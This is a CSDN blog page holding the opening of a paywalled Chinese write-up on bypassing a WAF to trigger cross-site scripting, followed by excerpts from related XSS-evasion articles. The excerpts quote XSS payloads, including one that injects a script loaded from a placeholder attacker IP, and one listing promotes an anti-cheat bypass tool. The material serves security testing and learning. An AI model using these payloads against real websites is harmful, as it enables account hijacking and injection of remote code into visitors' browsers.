xss绕过尖括号和双括号_看我如何 Bypass WAF 弹 XSS

最新推荐文章于 2024-05-26 09:44:23 发布
最新推荐文章于 2024-05-26 09:44:23 发布
阅读量1.6k 收藏 2
点赞数 1
文章标签: xss绕过尖括号和双括号
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_32955455/article/details/112400845
版权
本文介绍了如何通过拼接函数和构造结尾方法绕过WAF的XSS防御,详细展示了在遇到JavaScript中的可控点时,如何分析函数限制并构造有效payload,实现页面加载时自动触发的XSS攻击。
摘要由CSDN通过智能技术生成

点击蓝字

ceed0c8c88a85d64f518219c57e42273.gif

关注我们

声明

本文作者:Keac
本文字数:1600

阅读时长:15分钟

附件/链接:点击查看原文下载

声明:请勿用作违法用途,否则后果自负

本文属于WgpSec原创奖励计划,未经许可禁止转载

前言

Xss bypass waf 并且构造函数 使危害更大,一般我们找到一个在js里面的可控点往往不能使危害更大,比如打开页面就执行

一、

开始

正在干活,同事发来一条消息

73a1d10ea0f8013ea1dd4d3c6da01175.png

XSS?搞起

随手试了下,发现网站存在WAF

99823b134a1aaba9cd96e440ccce3ede.png

XSS利用第一步,寻找可控点

根据提供的链接,找到了两个可控点

e238c8b37493dc2e4e3d7f9674fd99ad.png

653ffea656aa16dfd4e657371e8a2cf0.png

首先来看下第一个可控点,是一个input,来看看又没过滤 "

" 没有被过滤和转义,好家伙走起

3cfc11ee4e4bc31d6e868c06f4ae2fac.png

构造一波,在Chrome高亮显示帮助我们看清楚,我们已经把前面的 " 给截断了

046769937ce7c63cd588b931329fc002.png

oncange 没被识别为攻击拦截,但是onclick 被拦截了,应该是对组合关键词进行了识别

最低0.47元/天 解锁文章
佐懿
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
xss绕过尖括号括号_xss防御及绕过-小记1
weixin_29315091的博客
12-23 2986
XSS搞安全的应该都很熟悉。本次并不是说其原理,仅是分享下在测试过程中遇到的案例。本人小白一枚,所以案例大佬们看着可能非常简单,就当是记录下自己笔记吧,不喜勿喷哈。。关于xss的防御,基本上都是采用输入过滤,输出编码。最近做的一个项目中的某个模块中,进行了输入过滤,采用跳转的形式。比如遇到<>或alert,响应包就会302跳转到固定网址。遇到这种黑名单的可以尝试各种绕过。有些输入是在i...
xss过滤绕过方法总结
jinhezhai的博客
09-15 1万+
xss注入常用语句、 1.<script>alert(1)</script> 2.<img src="#" onmouseover="alert(11)"> 3.<img src="#" onerror="alert('xss')"> 4.<svg onload=alert(1)> 5.<a href=javascript:alert(1)> 1.尝试绕过 2.大小写绕过、 3.js编码#unicode js的一种编码方式。 4.h
探索游戏世界的新钥匙:EAC Bypass
最新发布
gitblog_00051的博客
05-26 300
探索游戏世界的新钥匙:EAC Bypass 项目地址:https://gitcode.com/Schnocker/EAC_dbp 1、项目介绍 在电子竞技的浪潮中,反作弊系统(如Easy Anti-Cheat, 简称EAC)扮演着至关重要的角色,它确保了在线对战的公平性。然而,对于开发者和测试人员来说,这些系统有时会成为调试游戏的阻碍。为了打破这一僵局,我们推出了EAC Bypass —— 一个轻...
我的渗透笔记之XSS绕过技巧
xf555er的博客
03-03 1万+
1、单引号、引号和尖括号之间的闭合。 有些标签例如,构造的payload应该为” >,那么组成的标签为<input value=""><script>alert(1)</script>" 2、尖括号被转义,利用注释符号和一些属性事件. 例如,构造payload为" οnclick=alert(1)//,组成的标签为<input value="" o...
xss尖括号等被转义情况下的绕过测试
z1moq的博客
07-25 1万+
打开靶场 目标网站存在反射型xss漏洞,我们使用常用的方法进行测试 发现并无作用,打开网站源码查看问题情况 确实后端会将用户输入的数据无过滤直接返回前端,但是存在个别符号被转义的问题,导致无法正常窗 通过查找资料可知,可以通过使用三重url编码的方式绕过这一问题 尝试使用此方法进行绕过 emmmmmmm发现并不行 尝试使用编码绕过 发现也被转义了 既然无法实现转义的绕过,就再次仔细观察前端页面代码 发现在form表单中也会直接显示,并且发现 value 的值是由单引号闭合,且单引号在前几次测
(27)【xss绕过】一般测试步骤、绕过方法:触发事件、干扰、编码……
04-03 6437
XSS绕过-合集】
【应用安全——XSS过滤括号尖括号绕过
热门推荐
Fly_鹏程万里
02-22 4万+
先看下程序大概写法: &lt;?php header("X-XSS-Protection:0"); $out = $_GET['code']; $out = str_replace("&lt;","&amp;lt;",$out); $out = str_replace("&gt;","&amp;gt;",$out); $out = str_replace(&quot
XSS-Game level 10
wangyuxiang946的博客
07-08 1万+
xssgame10,XSS-Game第十关过滤尖括号 > < , 并且隐藏了输入框 , 使用事件绕过,并使输入框取消隐藏
104_XSS_Filter_Evasion_And_WAF_Bypassing.pdf
06-11
某国外培训机构的xss bypass思路和教程,Over the years, many security researchers have developed guides and cheat sheets to help security professionals in testing Cross-Site Scripting flaws. The most ...
WAF攻防实战笔记v1.0--Bypass.pdf
03-30
本笔记详细介绍了绕过WAF的方法和实战技巧,涵盖服务器特性、数据库特性、应用层特性和WAF层特性等多个方面。以下是从文件中提取的关键知识点: ### 服务器特性 在服务器层面,攻击者会利用特定服务器软件的特性或...
WAF的正确bypass
10-20
**WAF的正确bypass** 是指在遇到Web应用程序防火墙(Web Application Firewall)时,通过巧妙的方法绕过其安全防护机制,实现有效测试或安全验证。WAFs设计用于保护网站免受SQL注入、跨站脚本攻击(XSS)、CSRF等...
Bypassing-Web-Application-Firewall-Workshop-eBook.en.zh-CN.pdf
05-24
绕过 WAF 的技术主要包括利用 WAF 的特定漏洞、采用复杂的编码方式、利用多步攻击策略等。下面详细介绍几种常见的绕过技术: 1. **HTTP 参数污染 (HPP)**:通过向 URL 中添加额外的参数来混淆原始请求,从而使 WAF ...
xss-swig:从已知来源生成部分和可修改的XSS有效载荷
02-27
资料来源: usage: xsswig.py [-h] [-g {protocols,dangling_markup,useful_tags,special_tags,restricted_characters,encodings,classic,obfuscation,polyglot,waf_bypass_global_obj,frameworks,angularjs,vuejs,...
XSS绕过方式
OKAY_TC的博客
04-16 2949
记录挖洞过程中所遇到的XSS绕过 1. 过滤了<>尖括号: //原理:利用html以及js伪协议,当用户打开页面缓冲页面会自动获取焦点,从而触发js代码生成script标签,达到目的。 autofocus onfocus=location="javasCript:s=document.createElement("script");s.src="http://<ip>...
xss绕过尖括号括号_强防御下的XSS绕过思路(一)白名单篇
weixin_39532754的博客
12-27 5375
前 言很多白帽子在挖掘XSS漏洞的时候,往往会遇到一个问题,就是明明发现这里的过滤有缺陷,但是就是没法成功的进行构造利用。可能会由于自身对XSS绕过的局限性思维,往往只会反复的去尝试各种不同 payload代码,寄希望于其中某一个可以绕过过滤。但是在遇到强有力的XSS防御措施下,往往只能是竹篮打水一场空。鉴于这种情况,这里主要分3个章节来简单的分享一些XSS绕过思路。【第一节】 白名单限...
XSS绕过
m0_59855041的博客
09-04 202
alert(1)
记一次XSS攻击绕过
zkaqlaoniao的博客
10-27 436
最近一直在看国外的赏金平台,绕waf是真的难受, 记录一下绕过的场景。
XSS绕过经验总结
weixin_46622976的博客
10-20 2128
XSS经验总结
XSS 绕过指南
weixin_51681694的博客
04-22 1461
因为各种原因,在此总结一下网络上的绕过方法以及个人的经验,会不断更新,若有错误请私信
xss绕过尖括号转义
10-12
3. 使用JavaScript编码:可以使用JavaScript编码来绕过尖括号的转义,例如使用“document.write('\x3cscript>alert('XSS')\x3c/script>')”来注入JavaScript代码。 4. 使用URL编码:可以使用URL编码来绕过尖括号的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值